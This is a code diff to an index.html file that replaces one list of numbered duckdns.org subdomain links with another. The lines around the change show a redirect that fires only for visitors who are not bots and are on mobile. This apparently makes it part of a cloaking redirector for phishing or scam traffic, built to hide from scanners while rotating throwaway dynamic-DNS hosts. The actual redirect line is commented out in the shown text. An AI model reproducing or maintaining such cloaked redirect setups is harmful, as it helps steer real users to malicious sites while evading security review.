--- a/index.html
+++ b/index.html
@@ -270,36 +270,36 @@
 
 
             var links = {
-                "Active01": "https://154551220910.duckdns.org",
-                "Active02": "https://154551220911.duckdns.org",
-                "Active03": "https://154551220912.duckdns.org",
-                "Active04": "https://154551220913.duckdns.org",
-                "Active05": "https://154551220914.duckdns.org",
-                "Active06": "https://154551220915.duckdns.org",
-                "Active07": "https://154551220916.duckdns.org",
-                "Active08": "https://154551220917.duckdns.org",
-                "Active09": "https://154551220918.duckdns.org",
-                "Active10": "https://154551220919.duckdns.org",
-                "Active11": "https://7464534525611.duckdns.org",
-                "Active12": "https://7464534525612.duckdns.org",
-                "Active13": "https://7464534525613.duckdns.org",
-                "Active14": "https://7464534525614.duckdns.org",
-                "Active15": "https://7464534525615.duckdns.org",
-                "Active16": "https://7464534525616.duckdns.org",
-                "Active17": "https://7464534525617.duckdns.org",
-                "Active18": "https://7464534525618.duckdns.org",
-                "Active19": "https://7464534525619.duckdns.org",
-                "Active20": "https://7464534525620.duckdns.org",
-		"Secure01": "https://6566601.duckdns.org",
-                "Secure02": "https://6566602.duckdns.org",
-                "Secure03": "https://6566603.duckdns.org",
-                "Secure04": "https://6566604.duckdns.org",
-                "Secure05": "https://6566605.duckdns.org",
-                "Secure06": "https://6566606.duckdns.org",
-                "Secure07": "https://6566607.duckdns.org",
-                "Secure08": "https://6566608.duckdns.org",
-                "Secure09": "https://6566609.duckdns.org",
-                "Secure10": "https://6566610.duckdns.org",
+                "Secure01": "https://3232301.duckdns.org",
+                "Secure02": "https://3232302.duckdns.org",
+                "Secure03": "https://3232303.duckdns.org",
+                "Secure04": "https://3232304.duckdns.org",
+                "Secure05": "https://3232305.duckdns.org",
+                "Secure06": "https://3232306.duckdns.org",
+                "Secure07": "https://3232307.duckdns.org",
+                "Secure08": "https://3232308.duckdns.org",
+                "Secure09": "https://3232309.duckdns.org",
+                "Secure10": "https://3232310.duckdns.org",
+                "Active11": "https://34543645647441.duckdns.org",
+                "Active12": "https://34543645647442.duckdns.org",
+                "Active13": "https://34543645647443.duckdns.org",
+                "Active14": "https://34543645647444.duckdns.org",
+                "Active15": "https://34543645647445.duckdns.org",
+                "Active16": "https://34543645647446.duckdns.org",
+                "Active17": "https://34543645647447.duckdns.org",
+                "Active18": "https://34543645647448.duckdns.org",
+                "Active19": "https://34543645647449.duckdns.org",
+                "Active20": "https://34543645647450.duckdns.org",
+                "Accept11": "https://154551220910.duckdns.org",
+                "Accept12": "https://154551220911.duckdns.org",
+                "Accept13": "https://154551220912.duckdns.org",
+                "Accept14": "https://154551220913.duckdns.org",
+                "Accept15": "https://154551220914.duckdns.org",
+                "Accept16": "https://154551220915.duckdns.org",
+                "Accept17": "https://154551220916.duckdns.org",
+                "Accept18": "https://154551220917.duckdns.org",
+                "Accept19": "https://154551220918.duckdns.org",
+                "Accept20": "https://154551220919.duckdns.org",
             };
             if (!is_bot && is_MIbile) {
                 //window.location.href = links[code];
